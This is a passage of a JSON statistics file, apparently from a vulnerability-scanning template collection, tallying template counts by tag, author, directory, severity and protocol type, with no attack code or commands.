:"maian","count":2},{"name":"nagios","count":2},{"name":"rockmongo","count":2},{"name":"kentico","count":2},{"name":"icewarp","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name
":"keycloak","count":2},{"name":"linkerd","count":2},{"name":"hasura","count":2},{"name":"openam","count":2},{"name":"guacamole","count":2},{"name":"hjtcloud","count":2},{"name":"odoo","count":2},{"name":"igs","count":2},{"name":"service","count":2},{"name":"smtp","count":2},{"name":"fortios","count":2},{"name":"openfire","count":2},{"name":"chamilo","count":2},{"name":"pega","count":2},{"name":"ucmdb","count":2},{"name":"cve2005","count":2},{"name":"voipmonitor","count":2},{"name":"hpe","count":2},{"name":"hashicorp","count":2},{"name":"rstudio","count":2},{"name":"azure","count":2},{"name":"ecology","count":2},{"name":"grav","count":2},{"name":"cache","count":2},{"name":"showdoc","count":2},{"name":"injection","count":2},{"name":"emerge","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nextjs","count":2},{"name":"webcam","count":2},{"name":"activemq","count":2},{"name":"glassfish","count":2},{"name":"akkadian","count":2},{"name":"github","count":2},{"name":"saltstack","count":2},{"name":"waf","count":2},{"name":"spark","count":2},{"name":"geowebserver","count":2},{"name":"jboss","count":2},{"name":"dos","count":2},{"name":"wordfence","count":2},{"name":"xxljob","count":2},{"name":"splunk","count":2},{"name":"couchdb","count":2},{"name":"dolibarr","count":2},{"name":"seeyon","count":2},{"name":"paloalto","count":2},{"name":"backdoor","count":2},{"name":"akamai","count":2},{"name":"globalprotect","count":2},{"name":"flir","count":2},{"name":"sonicwall","count":2},{"name":"phpcollab","count":2},{"name":"horde","count":2},{"name":"csrf","count":1},{"name":"sco","count":1},{"name":"redhat","count":1},{"name":"ambari","count":1},{"name":"geutebruck","count":1},{"name":"sgp","count":1},{"name":"xvr","count":1},{"name":"gespage","count":1},{"name":"bullwark","count":1},{"name":"sophos","count":1},{"name":"memcached","count":1},{"name":"ilo","count":1},{"name":"smi","count":1},{"name":"hadoop","count":1},{"name":"ns","count":1},{"name":"xiuno","cou
nt":1},{"name":"dotnetnuke","count":1},{"name":"opensmtpd","count":1},{"name":"exponentcms","count":1},{"name":"exposures","count":1},{"name":"kerbynet","count":1},{"name":"spip","count":1},{"name":"ruby","count":1},{"name":"tenda","count":1},{"name":"mantisbt","count":1},{"name":"nuxeo","count":1},{"name":"clave","count":1},{"name":"varnish","count":1},{"name":"ewebs","count":1},{"name":"cofax","count":1},{"name":"grails","count":1},{"name":"visionhub","count":1},{"name":"logontracer","count":1},{"name":"monitorix","count":1},{"name":"biometrics","count":1},{"name":"klog","count":1},{"name":"twitter-server","count":1},{"name":"xunchi","count":1},{"name":"openx","count":1},{"name":"ssl","count":1},{"name":"expose","count":1},{"name":"viewlinc","count":1},{"name":"realteo","count":1},{"name":"labtech","count":1},{"name":"camera","count":1},{"name":"nomad","count":1},{"name":"2014","count":1},{"name":"dnssec","count":1},{"name":"magicflow","count":1},{"name":"panabit","count":1},{"name":"zmanda","count":1},{"name":"totaljs","count":1},{"name":"traefik","count":1},{"name":"cherokee","count":1},{"name":"subrion","count":1},{"name":"mailchimp","count":1},{"name":"acme","count":1},{"name":"aruba","count":1},{"name":"manageengine","count":1},{"name":"cocoon","count":1},{"name":"embedthis","count":1},{"name":"portainer","count":1},{"name":"timeclock","count":1},{"name":"axis","count":1},{"name":"majordomo2","count":1},{"name":"pgadmin","count":1},{"name":"k8","count":1},{"name":"turbocrm","count":1},{"name":"livezilla","count":1},{"name":"fuelcms","count":1},{"name":"nuuo","count":1},{"name":"landrayoa","count":1},{"name":"krweb","count":1},{"name":"liferay","count":1},{"name":"esmtp","count":1},{"name":"szhe","count":1},{"name":"timesheet","count":1},{"name":"jenkin","count":1},{"name":"pippoint","count":1},{"name":"spectracom","count":1},{"name":"uwsgi","count":1},{"name":"goahead","count":1},{"name":"bigbluebutton","count":1},{"name":"dotclear","count":1},{"name":"dotnet
","count":1},{"name":"cloudinary","count":1},{"name":"nedi","count":1},{"name":"bruteforce","count":1},{"name":"mantis","count":1},{"name":"tjws","count":1},{"name":"clockwatch","count":1},{"name":"zyxel","count":1},{"name":"wazuh","count":1},{"name":"sage","count":1},{"name":"jnoj","count":1},{"name":"zarafa","count":1},{"name":"glpi","count":1},{"name":"saltapi","count":1},{"name":"vsphere","count":1},{"name":"cerebro","count":1},{"name":"postmessage","count":1},{"name":"plastic","count":1},{"name":"finereport","count":1},{"name":"rfi","count":1},{"name":"chevereto","count":1},{"name":"clusterengine","count":1},{"name":"moinmoin","count":1},{"name":"erp-nc","count":1},{"name":"jquery","count":1},{"name":"netsweeper","count":1},{"name":"sidekiq","count":1},{"name":"extractor","count":1},{"name":"sarg","count":1},{"name":"redis","count":1},{"name":"geddy","count":1},{"name":"announcekit","count":1},{"name":"xdcms","count":1},{"name":"crm","count":1},{"name":"svn","count":1},{"name":"sangfor","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"lotuscms","count":1},{"name":"vsftpd","count":1},{"name":"blackboard","count":1},{"name":"kyan","count":1},{"name":"fedora","count":1},{"name":"iptime","count":1},{"name":"dvwa","count":1},{"name":"blind","count":1},{"name":"gogs","count":1},{"name":"getsimple","count":1},{"name":"doh","count":1},{"name":"email","count":1},{"name":"cve2006","count":1},{"name":"cse","count":1},{"name":"primetek","count":1},{"name":"camunda","count":1},{"name":"ecom","count":1},{"name":"influxdb","count":1},{"name":"hiboss","count":1},{"name":"exacqvision","count":1},{"name":"harbor","count":1},{"name":"razor","count":1},{"name":"aura","count":1},{"name":"optiLink","count":1},{"name":"bookstack","count":1},{"name":"floc","count":1},{"name":"nordex","count":1},{"name":"jitsi","count":1},{"name":"cloudflare","count":1},{"name":" 
default-login","count":1},{"name":"zenario","count":1},{"name":"tectuus","count":1},{"name":"visualtools","count":1},{"name":"npm","count":1},{"name":"netrc","count":1},{"name":"qdpm","count":1},{"name":"skywalking","count":1},{"name":"diris","count":1},{"name":"webmin","count":1},{"name":"pacsone","count":1},{"name":"ems","count":1},{"name":"tracer","count":1},{"name":"perl","count":1},{"name":"redcap","count":1},{"name":"gloo","count":1},{"name":"spf","count":1},{"name":"rdp","count":1},{"name":"auth","count":1},{"name":"fastapi","count":1},{"name":"shopxo","count":1},{"name":"ghost","count":1},{"name":"svnserve","count":1},{"name":"phpfastcache","count":1},{"name":"cobub","count":1},{"name":"st","count":1},{"name":"opm","count":1},{"name":"keenetic","count":1},{"name":"ricoh","count":1},{"name":"mobileiron","count":1},{"name":"rubedo","count":1},{"name":"springframework","count":1},{"name":"wmt","count":1},{"name":"wing-ftp","count":1},{"name":"mediumish","count":1},{"name":"soar","count":1},{"name":"appweb","count":1},{"name":"vnc","count":1},{"name":"synnefo","count":1},{"name":"bash","count":1},{"name":"wuzhicms","count":1},{"name":"sprintful","count":1},{"name":"kong","count":1},{"name":"yii","count":1},{"name":"office365","count":1},{"name":"emc","count":1},{"name":"jeewms","count":1},{"name":"wooyun","count":1},{"name":"mariadb","count":1},{"name":"codeigniter","count":1},{"name":"webftp","count":1},{"name":"bolt","count":1},{"name":"wavemaker","count":1},{"name":"linux","count":1},{"name":"flink","count":1},{"name":"eyou","count":1},{"name":"monitorr","count":1},{"name":"ssltls","count":1},{"name":"zzzcms","count":1},{"name":"clink-office","count":1},{"name":"fiori","count":1},{"name":"sqlite","count":1},{"name":"node","count":1},{"name":"pulsesecure","count":1},{"name":"ntopng","count":1},{"name":"mysql","count":1},{"name":"checkpoint","count":1},{"name":"lanproxy","count":1},{"name":"duomicms","count":1},{"name":"parentlink","count":1},{"name":"nps","cou
nt":1},{"name":"moin","count":1},{"name":"node-red-dashboard","count":1},{"name":"eprints","count":1},{"name":"apos","count":1},{"name":"setup","count":1},{"name":"miscrsoft","count":1},{"name":"pyramid","count":1},{"name":"hortonworks","count":1},{"name":"linksys","count":1},{"name":"scimono","count":1},{"name":"faraday","count":1},{"name":"nsasg","count":1},{"name":"owa","count":1},{"name":"b2evolution","count":1},{"name":"phpunit","count":1},{"name":"openstack","count":1},{"name":"anchorcms","count":1},{"name":"calendarix","count":1},{"name":"woocomernce","count":1},{"name":"plugin","count":1},{"name":"tongda","count":1},{"name":"metinfo","count":1},{"name":"opentsdb","count":1},{"name":"fortigate","count":1},{"name":"arl","count":1},{"name":"powercreator","count":1},{"name":"phpinfo","count":1},{"name":"azkaban","count":1},{"name":"alerta","count":1},{"name":"plone","count":1},{"name":"seacms","count":1},{"name":"cgi","count":1},{"name":"api-manager","count":1},{"name":"pagespeed","count":1},{"name":"sitecore","count":1},{"name":"fortilogger","count":1},{"name":"xml","count":1},{"name":"shopware","count":1},{"name":"tapestry","count":1},{"name":"asus","count":1},{"name":"sureline","count":1},{"name":"yealink","count":1},{"name":"achecker","count":1},{"name":"wondercms","count":1},{"name":"zcms","count":1},{"name":"vscode","count":1},{"name":"openerp","count":1},{"name":"ilo4","count":1},{"name":"spidercontrol","count":1},{"name":"panos","count":1},{"name":"cacti","count":1},{"name":"linkedin","count":1},{"name":"tensorflow","count":1},{"name":"glances","count":1},{"name":"yachtcontrol","count":1},{"name":"mirai","count":1},{"name":"lutron","count":1},{"name":"servicedesk","count":1},{"name":"jsp","count":1},{"name":"alibaba","count":1},{"name":"flash","count":1},{"name":"haproxy","count":1},{"name":"druid","count":1},{"name":"comodo","count":1},{"name":"bitly","count":1},{"name":"dvr","count":1},{"name":"sentry","count":1},{"name":"webadmin","count":1},{"name":"
phpfusion","count":1},{"name":"concrete","count":1},{"name":"nexusdb","count":1},{"name":"gateone","count":1},{"name":"acexy","count":1},{"name":"scs","count":1},{"name":"tamronos","count":1},{"name":"beanshell","count":1},{"name":"xmlchart","count":1},{"name":"starttls","count":1},{"name":"opencast","count":1},{"name":"trilithic","count":1},{"name":"aspnuke","count":1},{"name":"interlib","count":1},{"name":"alertmanager","count":1},{"name":"payara","count":1},{"name":"iceflow","count":1},{"name":"emby","count":1},{"name":"gotmls","count":1},{"name":"default","count":1},{"name":"myucms","count":1},{"name":"robomongo","count":1},{"name":"openemr","count":1},{"name":"phalcon","count":1},{"name":"nette","count":1},{"name":"thinkadmin","count":1},{"name":"zeroshell","count":1},{"name":"adminer","count":1},{"name":"jenzabar","count":1},{"name":"fastcgi","count":1},{"name":"heroku","count":1},{"name":"selea","count":1},{"name":"triconsole","count":1},{"name":"db","count":1},{"name":"octobercms","count":1},{"name":"maccmsv10","count":1},{"name":"jmx","count":1},{"name":"netdata","count":1},{"name":"spring","count":1},{"name":"rujjie","count":1},{"name":"74cms","count":1},{"name":"enumeration","count":1},{"name":"tileserver","count":1},{"name":"fortinet","count":1},{"name":"fortiweb","count":1},{"name":"gitlist","count":1},{"name":"cors","count":1},{"name":"ec2","count":1},{"name":"darkstat","count":1},{"name":"servicenow","count":1},{"name":"tieline","count":1},{"name":"csod","count":1},{"name":"mautic","count":1},{"name":"mongo","count":1},{"name":"plc","count":1},{"name":"sourcebans","count":1},{"name":"huijietong","count":1},{"name":"h3c-imc","count":1},{"name":"owasp","count":1},{"name":"lighttpd","count":1},{"name":"expressjs","count":1},{"name":"qsan","count":1},{"name":"oscommerce","count":1},{"name":"sar2html","count":1},{"name":"lansweeper","count":1},{"name":"kubeflow","count":1},{"name":"salesforce","count":1},{"name":"discord","count":1},{"name":"mongoshake","c
ount":1},{"name":"oneblog","count":1},{"name":"rabbitmq","count":1},{"name":"websvn","count":1},{"name":"proftpd","count":1},{"name":"webui","count":1},{"name":"viewpoint","count":1},{"name":"upnp","count":1},{"name":"zte","count":1},{"name":"argussurveillance","count":1},{"name":"nweb2fax","count":1},{"name":"adb","count":1},{"name":"weiphp","count":1},{"name":"eyelock","count":1},{"name":"episerver","count":1},{"name":"webmodule-ee","count":1},{"name":"lg-nas","count":1},{"name":"codemeter","count":1},{"name":"prestashop","count":1},{"name":"feifeicms","count":1},{"name":"jfrog","count":1},{"name":"openrestry","count":1},{"name":"enum","count":1},{"name":"xff","count":1},{"name":"avtech","count":1},{"name":"apiman","count":1},{"name":"ulterius","count":1},{"name":"circontrorl","count":1},{"name":"lancom","count":1},{"name":"idemia","count":1},{"name":"ruckus","count":1},{"name":"addpac","count":1},{"name":"solarlog","count":1},{"name":"qcubed","count":1},{"name":"smartsense","count":1},{"name":"wiki","count":1},{"name":"rsyncd","count":1},{"name":"expn","count":1},{"name":"tensorboard","count":1},{"name":"bazarr","count":1},{"name":"sceditor","count":1},{"name":"favicon","count":1},{"name":"trane","count":1},{"name":"kafdrop","count":1},{"name":"centreon","count":1},{"name":"landray","count":1},{"name":"tika","count":1},{"name":"rmc","count":1},{"name":"netgenie","count":1},{"name":"domxss","count":1},{"name":"mpsec","count":1},{"name":"dom","count":1},{"name":"acontent","count":1},{"name":"wifisky","count":1},{"name":"wildfly","count":1},{"name":"k8s","count":1},{"name":"wamp","count":1},{"name":"drone","count":1},{"name":"bedita","count":1},{"name":"upload","count":1},{"name":"redwood","count":1},{"name":"rmi","count":1},{"name":"froxlor","count":1},{"name":"zend","count":1},{"name":"nc2","count":1},{"name":"socomec","count":1},{"name":"opensns","count":1},{"name":"rhymix","count":1},{"name":"wavlink","count":1},{"name":"zm","count":1},{"name":"zookeeper","count
":1},{"name":"cyberoam","count":1},{"name":"htmli","count":1},{"name":"empirecms","count":1},{"name":"mdb","count":1},{"name":"octoprint","count":1},{"name":"stem","count":1},{"name":"tpshop","count":1},{"name":"javamelody","count":1},{"name":"etouch","count":1},{"name":"swagger","count":1},{"name":"dompdf","count":1},{"name":"centos","count":1},{"name":"fortigates","count":1},{"name":"commscope","count":1},{"name":"simplecrm","count":1},{"name":"solman","count":1},{"name":"circontrol","count":1},{"name":"postgres","count":1},{"name":"ioncube","count":1},{"name":"javascript","count":1},{"name":"chinaunicom","count":1},{"name":"gridx","count":1},{"name":"qvisdvr","count":1},{"name":"ueditor","count":1},{"name":"discourse","count":1},{"name":"accela","count":1},{"name":"couchbase","count":1},{"name":"blue-ocean","count":1},{"name":"dbeaver","count":1},{"name":"resourcespace","count":1},{"name":"javafaces","count":1},{"name":"ganglia","count":1}],"authors":[{"name":"pikpikcu","count":243},{"name":"dhiyaneshdk","count":240},{"name":"pdteam","count":196},{"name":"daffainfo","count":160},{"name":"geeknik","count":149},{"name":"dwisiswant0","count":131},{"name":"gy741","count":71},{"name":"madrobot","count":62},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":42},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},
{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"meme-lord","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"xelkomy","count":4},{"name":"elsfa7110","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"emenalf","count":3},{"name":"fyoorer","count":3},{"name":"shifacyclewala","count":3},{"name":"vsh00t","count":3},{"name":"incogbyte","count":3},{"name":"f1tz","count":3},{"name":"binaryfigments","count":3},{"name":"thomas_from_offensity","count":3},{"name":"mavericknerd","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"0w4ys","count":3},{"name":"shine","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"jarijaas","count":3},{"name":"koti2","count":2},{"name":"random-robbie","count":2},{"name":"0xelkomy","count":2},{"name":"lu4nx","count":2},{"name":"arcc","count":2},{"name":"hetroublemakr","count":2},{"name":"davidmckennirey","count":2},{"name":"0xprial","count":2},{"name":"kiblyn11","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"w4cky_","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"lotusdll","count":2},{"name":"afaq","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"moritz 
nentwig","count":2},{"name":"zomsop82","count":2},{"name":"mohammedsaneem","count":2},{"name":"swissky","count":2},{"name":"gevakun","count":2},{"name":"bp0lr","count":2},{"name":"nkxxkn","count":2},{"name":"sushantkamble","count":2},{"name":"ree4pwn","count":2},{"name":"gal nagli","count":2},{"name":"randomrobbie","count":2},{"name":"foulenzer","count":2},{"name":"ehsahil","count":2},{"name":"fabaff","count":2},{"name":"manas_harsh","count":2},{"name":"pxmme1337","count":2},{"name":"0xcrypto","count":2},{"name":"alifathi-h1","count":2},{"name":"dheerajmadhukar","count":2},{"name":"amsda","count":2},{"name":"0xrudra","count":2},{"name":"vavkamil","count":2},{"name":"joeldeleep","count":2},{"name":"udit_thakkur","count":2},{"name":"parth","count":2},{"name":"0xsapra","count":2},{"name":"hahwul","count":2},{"name":"geraldino2","count":1},{"name":"flag007","count":1},{"name":"intx0x80","count":1},{"name":"qlkwej","count":1},{"name":"_c0wb0y_","count":1},{"name":"cookiehanhoan","count":1},{"name":"idealphase","count":1},{"name":"elmahdi","count":1},{"name":"patralos","count":1},{"name":"micha3lb3n","count":1},{"name":"hakluke","count":1},{"name":"whynotke","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"rtcms","count":1},{"name":"furkansenan","count":1},{"name":"th3.d1p4k","count":1},{"name":"rojanrijal","count":1},{"name":"juicypotato1","count":1},{"name":"nytr0gen","count":1},{"name":"iampritam","count":1},{"name":"_harleo","count":1},{"name":"exploitation","count":1},{"name":"0ut0fb4nd","count":1},{"name":"dogasantos","count":1},{"name":"bjhulst","count":1},{"name":"raesene","count":1},{"name":"ipanda","count":1},{"name":"akash.c","count":1},{"name":"aresx","count":1},{"name":"kurohost","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"remonsec","count":1},{"name":"daviey","count":1},{"name":"borna 
nematzadeh","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"alex","count":1},{"name":"mass0ma","count":1},{"name":"tirtha_mandal","count":1},{"name":"adrianmf","count":1},{"name":"abison_binoy","count":1},{"name":"yashanand155","count":1},{"name":"notsoevilweasel","count":1},{"name":"pratik khalane","count":1},{"name":"ooooooo_q","count":1},{"name":"affix","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"mah3sec_","count":1},{"name":"retr0","count":1},{"name":"52971","count":1},{"name":"soyelmago","count":1},{"name":"0xrod","count":1},{"name":"omarkurt","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"its0x08","count":1},{"name":"toufik airane","count":1},{"name":"un-fmunozs","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"makyotox","count":1},{"name":"@dwisiswant0","count":1},{"name":"alph4byt3","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ahmed sherif","count":1},{"name":"thevillagehacker","count":1},{"name":"yashgoti","count":1},{"name":"ldionmarcil","count":1},{"name":"gboddin","count":1},{"name":"petruknisme","count":1},{"name":"absshax","count":1},{"name":"akshansh","count":1},{"name":"tim_koopmans","count":1},{"name":"sickwell","count":1},{"name":"huowuzhao","count":1},{"name":"shelld3v","count":1},{"name":"infosecsanyam","count":1},{"name":"zandros0","count":1},{"name":"evolutionsec","count":1},{"name":"kareemse1im","count":1},{"name":"johnjhacking","count":1},{"name":"rodnt","count":1},{"name":"fmunozs","count":1},{"name":"schniggie","count":1},{"name":"ajaysenr","count":1},{"name":"sullo","count":1},{"name":"willd96","count":1},{"name":"bolli95","count":1},{"name":"luci","count":1},{"name":"deena","count":1},{"name":"blckraven","count":1},{"name":"shifacyclewla","count":1},{"name":"c3l3si4n","count":1},{"name":"revblock","count":1},{"name":"ringo","count":1},{"name":"shreyapohekar","count":1},{"name":"sy3omda","count":1},{"name":"udyz","count":1},{"name":"streetof
hackerr007 (rohit soni)","count":1},{"name":"ohlinge","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"streetofhackerr007","count":1},{"name":"ilovebinbash","count":1},{"name":"_darrenmartyn","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"naglinagli","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"luskabol","count":1},{"name":"apt-mirror","count":1},{"name":"b0yd","count":1},{"name":"r3naissance","count":1},{"name":"sshell","count":1},{"name":"me9187","count":1},{"name":"co0nan","count":1},{"name":"philippdelteil","count":1},{"name":"berkdusunur","count":1},{"name":"manuelbua","count":1},{"name":"d0rkerdevil","count":1},{"name":"0h1in9e","count":1},{"name":"knassar702","count":1},{"name":"jeya seelan","count":1},{"name":"kabirsuda","count":1},{"name":"jteles","count":1},{"name":"s1r1u5_","count":1},{"name":"sicksec","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"0xteles","count":1},{"name":"undefl0w","count":1},{"name":"andirrahmani1","count":1},{"name":"andysvints","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"taielab","count":1},{"name":"vzamanillo","count":1},{"name":"mesaglio","count":1},{"name":"johnk3r","count":1},{"name":"mhdsamx","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"b4uh0lz","count":1},{"name":"smaranchand","count":1},{"name":"pudsec","count":1},{"name":"whoever","count":1},{"name":"bernardofsr","count":1},{"name":"mubassirpatel","count":1},{"name":"bad5ect0r","count":1},{"name":"dawid czarnecki","count":1},{"name":"divya_mudgal","count":1},{"name":"becivells","count":1},{"name":"0xtavian","count":1},{"name":"thezakman","count":1},{"name":"zhenwarx","count":1},{"name":"elder 
tao","count":1},{"name":"regala_","count":1},{"name":"j33n1k4","count":1},{"name":"fopina","count":1},{"name":"defr0ggy","count":1},{"name":"hanlaomo","count":1},{"name":"chron0x","count":1},{"name":"pdp","count":1},{"name":"yavolo","count":1},{"name":"noamrathaus","count":1},{"name":"sec_hawk","count":1}],"directory":[{"name":"cves","count":631},{"name":"vulnerabilities","count":281},{"name":"exposed-panels","count":225},{"name":"exposures","count":182},{"name":"technologies","count":160},{"name":"misconfiguration","count":125},{"name":"takeovers","count":71},{"name":"default-logins","count":51},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":29},{"name":"miscellaneous","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":592},{"name":"high","count":504},{"name":"medium","count":398},{"name":"critical","count":230},{"name":"low","count":161}],"types":[{"name":"http","count":1785},{"name":"file","count":46},{"name":"network","count":38},{"name":"dns","count":11}]} 
+{"tags":[{"name":"cve","count":632},{"name":"panel","count":232},{"name":"xss","count":224},{"name":"exposure","count":214},{"name":"lfi","count":207},{"name":"wordpress","count":203},{"name":"rce","count":189},{"name":"cve2020","count":157},{"name":"wp-plugin","count":136},{"name":"tech","count":105},{"name":"cve2021","count":104},{"name":"config","count":93},{"name":"cve2019","count":90},{"name":"cve2018","count":79},{"name":"takeover","count":74},{"name":"","count":66},{"name":"apache","count":64},{"name":"token","count":64},{"name":"default-login","count":57},{"name":"iot","count":56},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"oob","count":45},{"name":"joomla","count":40},{"name":"network","count":38},{"name":"sqli","count":37},{"name":"cve2010","count":32},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"oracle","count":30},{"name":"workflow","count":30},{"name":"logs","count":30},{"name":"jira","count":27},{"name":"atlassian","count":27},{"name":"misc","count":27},{"name":"redirect","count":25},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"disclosure","count":18},{"name":"cve2015","count":18},{"name":"sap","count":18},{"name":"auth-bypass","count":17},{"name":"router","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":14},{"name":"cve2012","count":14},{"name":"misconfig","count":13},{"name":"cve2011","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"android","count":13},{"name":"dlink","count":12},{"name":"weblogic","count":12},{"name":"php","count":12},{"name":"dns","count":12},{"name":"jenkins","count":12},{"name":"adobe","count":12},{"name":"devops","count":11},{"name":"zoho","count":11},{"name":"cve2013","count":11},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"xxe","count":9},{"name":"ruijie","count":8},{"name":"login","
count":8},{"name":"scada","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"nginx","count":7},{"name":"backup","count":7},{"name":"vmware","count":7},{"name":"cms","count":7},{"name":"cve2009","count":7},{"name":"google","count":6},{"name":"laravel","count":6},{"name":"api","count":6},{"name":"files","count":6},{"name":"dell","count":6},{"name":"netgear","count":6},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"cve2008","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"confluence","count":5},{"name":"fileupload","count":5},{"name":"microsoft","count":5},{"name":"circarlife","count":5},{"name":"wp-theme","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"dedecms","count":5},{"name":"drupal","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"docker","count":5},{"name":"printer","count":5},{"name":"ibm","count":5},{"name":"phpmyadmin","count":5},{"name":"nodejs","count":4},{"name":"elastic","count":4},{"name":"jolokia","count":4},{"name":"exchange","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"webserver","count":4},{"name":"thinkcmf","count":4},{"name":"tomcat","count":4},{"name":"deserialization","count":4},{"name":"firmware","count":4},{"name":"hp","count":4},{"name":"asp","count":4},{"name":"grafana","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"crlf","count":4},{"name":"vpn","count":4},{"name":"moodle","count":4},{"name":"buffalo","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"magmi","count":4},{"name":"zimbra","count":4},{"name":"r-seenet","count":3},{"name":"itop","count":3},{"name":"caucho","count":3},{"name":"kevinlab","count":3}
,{"name":"log","count":3},{"name":"mongodb","count":3},{"name":"zabbix","count":3},{"name":"httpd","count":3},{"name":"nexus","count":3},{"name":"oa","count":3},{"name":"zhiyuan","count":3},{"name":"symfony","count":3},{"name":"terramaster","count":3},{"name":"microstrategy","count":3},{"name":"amazon","count":3},{"name":"slack","count":3},{"name":"springcloud","count":3},{"name":"ebs","count":3},{"name":"fanruan","count":3},{"name":"nosqli","count":3},{"name":"git","count":3},{"name":"tikiwiki","count":3},{"name":"opensis","count":3},{"name":"kubernetes","count":3},{"name":"openssh","count":3},{"name":"bypass","count":3},{"name":"backups","count":3},{"name":"kafka","count":3},{"name":"nacos","count":3},{"name":"targa","count":3},{"name":"lfr","count":3},{"name":"ofbiz","count":3},{"name":"fpd","count":3},{"name":"bitrix","count":3},{"name":"intrusive","count":3},{"name":"wso2","count":3},{"name":"resin","count":3},{"name":"ssh","count":3},{"name":"vbulletin","count":3},{"name":"dos","count":2},{"name":"jboss","count":2},{"name":"shellshock","count":2},{"name":"cache","count":2},{"name":"nagios","count":2},{"name":"akkadian","count":2},{"name":"keycloak","count":2},{"name":"proxy","count":2},{"name":"splunk","count":2},{"name":"horde","count":2},{"name":"natshell","count":2},{"name":"dolibarr","count":2},{"name":"saltstack","count":2},{"name":"status","count":2},{"name":"hasura","count":2},{"name":"service","count":2},{"name":"sonicwall","count":2},{"name":"vrealize","count":2},{"name":"chamilo","count":2},{"name":"leak","count":2},{"name":"akamai","count":2},{"name":"frp","count":2},{"name":"openam","count":2},{"name":"azure","count":2},{"name":"rstudio","count":2},{"name":"phpcollab","count":2},{"name":"jsf","count":2},{"name":"maian","count":2},{"name":"chiyu","count":2},{"name":"ecology","count":2},{"name":"rockethchat","count":2},{"name":"hpe","count":2},{"name":"ucmdb","count":2},{"name":"openfire","count":2},{"name":"paloalto","count":2},{"name":"couchdb","co
